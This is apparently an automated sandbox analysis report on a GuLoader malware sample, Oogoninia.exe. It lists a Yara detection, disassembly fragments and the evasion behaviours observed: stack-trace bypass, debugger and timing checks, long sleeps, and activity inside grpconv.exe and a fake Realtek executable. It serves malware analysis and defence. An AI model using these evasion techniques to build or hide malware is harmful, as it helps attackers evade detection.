        Source: Binary string: wntdll.pdb source: Oogoninia.exe, Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.1193487825.0000000002E02000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_324F21AD pushad ; retf 0004h2_2_324F223F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_324F97A1 push es; iretd 2_2_324F97A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325208CD push ecx; mov dword ptr [esp], ecx2_2_325208D6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0412D01C pushad ; retf 4_2_0412D022
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0412843F push edi; ret 4_2_04128440
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0412D029 pushad ; retf 4_2_0412D036
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411FC43 push ds; ret 4_2_0411FC44
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411D901 push 78CA8A45h; iretd 4_2_0411D906
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411ED5F push edx; retf 4_2_0411ED60
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0412C9B7 push eax; ret 4_2_0412C9B9
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_0411E32E push ecx; ret 4_2_0411E32F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_04120BD1 push esp; iretd 4_2_04120BD9
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E7CB push cs; retn 0009h9_2_04C3E7A1
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E798 push cs; retn 0009h9_2_04C3E7A1
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C397A1 push es; iretd 9_2_04C397A8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E7A4 push esp; retn 0009h9_2_04C3E7A9
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E7B8 push ss; ret 9_2_04C3E7C1
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E060 push eax; retf 0008h9_2_04C3E06D
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3E074 pushfd ; retf 9_2_04C3E075
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C321AD pushad ; retf 0004h9_2_04C3223F
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C31210 push edx; ret 9_2_04C31216
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C3733B push eax; retf 0004h9_2_04C3734E
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C608CD push ecx; mov dword ptr [esp], ecx9_2_04C608D6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B30C1A push edi; ret 9_2_04B30C1B
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2841E push ds; ret 9_2_04B2841F
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2753A push edx; retf 9_2_04B2753B
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B30624 pushad ; iretd 9_2_04B3062C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B260DC push 78CA8A45h; iretd 9_2_04B260E1
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B35192 push eax; ret 9_2_04B35194
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B293AC push esp; iretd 9_2_04B293B4
        Source: C:\Users\user\Desktop\Oogoninia.exeFile created: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 30733AC
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 1A533AC
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0F0594
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0EFF74
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED6C4
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED864
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED144
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0F0594
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED764
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED324
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED364
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED004
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0EFF74
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED6C4
        Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FFEEA0ED864
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 rdtsc 2_2_32561763
        Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\grpconv.exeAPI coverage: 1.2 %
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exe TID: 6904Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: Oogoninia.exe, 00000002.00000003.1266977009.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354263850.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2834223466.000000000DDBC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5986237494.0000000009FC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5992234952.000000000DDBC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
        Source: grpconv.exe, 00000009.00000002.2899155555.0000000002CCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI call chain: ExitProcess graph end nodegraph_0-3797
        Source: C:\Users\user\Desktop\Oogoninia.exeAPI call chain: ExitProcess graph end nodegraph_0-3977
        Source: C:\Windows\SysWOW64\grpconv.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 rdtsc 2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00402B0E RegOpenKeyExA,RegEnumKeyA,RegEnumKeyA,RegCloseKey,LdrInitializeThunk,RegCloseKey,RegDeleteKeyA,0_2_00402B0E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E124C mov eax, dword ptr fs:[00000030h]2_2_325E124C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF247 mov eax, dword ptr fs:[00000030h]2_2_325DF247
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F24A mov eax, dword ptr fs:[00000030h]2_2_3254F24A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B273 mov eax, dword ptr fs:[00000030h]2_2_3251B273
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B273 mov eax, dword ptr fs:[00000030h]2_2_3251B273
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B273 mov eax, dword ptr fs:[00000030h]2_2_3251B273
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B327E mov eax, dword ptr fs:[00000030h]2_2_325B327E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DD270 mov eax, dword ptr fs:[00000030h]2_2_325DD270
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251821B mov eax, dword ptr fs:[00000030h]2_2_3251821B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AB214 mov eax, dword ptr fs:[00000030h]2_2_325AB214
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AB214 mov eax, dword ptr fs:[00000030h]2_2_325AB214
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251A200 mov eax, dword ptr fs:[00000030h]2_2_3251A200
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32540230 mov ecx, dword ptr fs:[00000030h]2_2_32540230
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A0227 mov eax, dword ptr fs:[00000030h]2_2_325A0227
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A0227 mov eax, dword ptr fs:[00000030h]2_2_325A0227
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A0227 mov eax, dword ptr fs:[00000030h]2_2_325A0227
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A22B mov eax, dword ptr fs:[00000030h]2_2_3255A22B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A22B mov eax, dword ptr fs:[00000030h]2_2_3255A22B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A22B mov eax, dword ptr fs:[00000030h]2_2_3255A22B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325432C5 mov eax, dword ptr fs:[00000030h]2_2_325432C5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F32C9 mov eax, dword ptr fs:[00000030h]2_2_325F32C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325302F9 mov eax, dword ptr fs:[00000030h]2_2_325302F9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325172E0 mov eax, dword ptr fs:[00000030h]2_2_325172E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A2E0 mov eax, dword ptr fs:[00000030h]2_2_3252A2E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325282E0 mov eax, dword ptr fs:[00000030h]2_2_325282E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325282E0 mov eax, dword ptr fs:[00000030h]2_2_325282E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325282E0 mov eax, dword ptr fs:[00000030h]2_2_325282E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325282E0 mov eax, dword ptr fs:[00000030h]2_2_325282E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D2EC mov eax, dword ptr fs:[00000030h]2_2_3251D2EC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D2EC mov eax, dword ptr fs:[00000030h]2_2_3251D2EC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E289 mov eax, dword ptr fs:[00000030h]2_2_3259E289
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3251C2B0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB2BC mov eax, dword ptr fs:[00000030h]2_2_325FB2BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB2BC mov eax, dword ptr fs:[00000030h]2_2_325FB2BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB2BC mov eax, dword ptr fs:[00000030h]2_2_325FB2BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB2BC mov eax, dword ptr fs:[00000030h]2_2_325FB2BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF2AE mov eax, dword ptr fs:[00000030h]2_2_325DF2AE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E92AB mov eax, dword ptr fs:[00000030h]2_2_325E92AB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325442AF mov eax, dword ptr fs:[00000030h]2_2_325442AF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325442AF mov eax, dword ptr fs:[00000030h]2_2_325442AF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325192AF mov eax, dword ptr fs:[00000030h]2_2_325192AF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A350 mov eax, dword ptr fs:[00000030h]2_2_3255A350
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32518347 mov eax, dword ptr fs:[00000030h]2_2_32518347
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32518347 mov eax, dword ptr fs:[00000030h]2_2_32518347
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32518347 mov eax, dword ptr fs:[00000030h]2_2_32518347
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E372 mov eax, dword ptr fs:[00000030h]2_2_3259E372
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E372 mov eax, dword ptr fs:[00000030h]2_2_3259E372
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E372 mov eax, dword ptr fs:[00000030h]2_2_3259E372
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E372 mov eax, dword ptr fs:[00000030h]2_2_3259E372
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A0371 mov eax, dword ptr fs:[00000030h]2_2_325A0371
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A0371 mov eax, dword ptr fs:[00000030h]2_2_325A0371
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254237A mov eax, dword ptr fs:[00000030h]2_2_3254237A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252B360 mov eax, dword ptr fs:[00000030h]2_2_3252B360
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E363 mov eax, dword ptr fs:[00000030h]2_2_3255E363
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253E310 mov eax, dword ptr fs:[00000030h]2_2_3253E310
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253E310 mov eax, dword ptr fs:[00000030h]2_2_3253E310
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253E310 mov eax, dword ptr fs:[00000030h]2_2_3253E310
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32539319 mov eax, dword ptr fs:[00000030h]2_2_32539319
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255631F mov eax, dword ptr fs:[00000030h]2_2_3255631F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32519303 mov eax, dword ptr fs:[00000030h]2_2_32519303
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32519303 mov eax, dword ptr fs:[00000030h]2_2_32519303
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A330C mov eax, dword ptr fs:[00000030h]2_2_325A330C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A330C mov eax, dword ptr fs:[00000030h]2_2_325A330C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A330C mov eax, dword ptr fs:[00000030h]2_2_325A330C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A330C mov eax, dword ptr fs:[00000030h]2_2_325A330C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF30A mov eax, dword ptr fs:[00000030h]2_2_325DF30A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F3336 mov eax, dword ptr fs:[00000030h]2_2_325F3336
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32558322 mov eax, dword ptr fs:[00000030h]2_2_32558322
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32558322 mov eax, dword ptr fs:[00000030h]2_2_32558322
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32558322 mov eax, dword ptr fs:[00000030h]2_2_32558322
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254332D mov eax, dword ptr fs:[00000030h]2_2_3254332D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E328 mov eax, dword ptr fs:[00000030h]2_2_3251E328
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E328 mov eax, dword ptr fs:[00000030h]2_2_3251E328
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E328 mov eax, dword ptr fs:[00000030h]2_2_3251E328
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325533D0 mov eax, dword ptr fs:[00000030h]2_2_325533D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325543D0 mov ecx, dword ptr fs:[00000030h]2_2_325543D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A43D5 mov eax, dword ptr fs:[00000030h]2_2_325A43D5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E3C0 mov eax, dword ptr fs:[00000030h]2_2_3251E3C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E3C0 mov eax, dword ptr fs:[00000030h]2_2_3251E3C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251E3C0 mov eax, dword ptr fs:[00000030h]2_2_3251E3C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251C3C7 mov eax, dword ptr fs:[00000030h]2_2_3251C3C7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325263CB mov eax, dword ptr fs:[00000030h]2_2_325263CB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254A390 mov eax, dword ptr fs:[00000030h]2_2_3254A390
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254A390 mov eax, dword ptr fs:[00000030h]2_2_3254A390
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254A390 mov eax, dword ptr fs:[00000030h]2_2_3254A390
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521380 mov eax, dword ptr fs:[00000030h]2_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521380 mov eax, dword ptr fs:[00000030h]2_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521380 mov eax, dword ptr fs:[00000030h]2_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521380 mov eax, dword ptr fs:[00000030h]2_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521380 mov eax, dword ptr fs:[00000030h]2_2_32521380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F380 mov eax, dword ptr fs:[00000030h]2_2_3253F380
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF38A mov eax, dword ptr fs:[00000030h]2_2_325DF38A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259C3B0 mov eax, dword ptr fs:[00000030h]2_2_3259C3B0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325293A6 mov eax, dword ptr fs:[00000030h]2_2_325293A6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325293A6 mov eax, dword ptr fs:[00000030h]2_2_325293A6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521051 mov eax, dword ptr fs:[00000030h]2_2_32521051
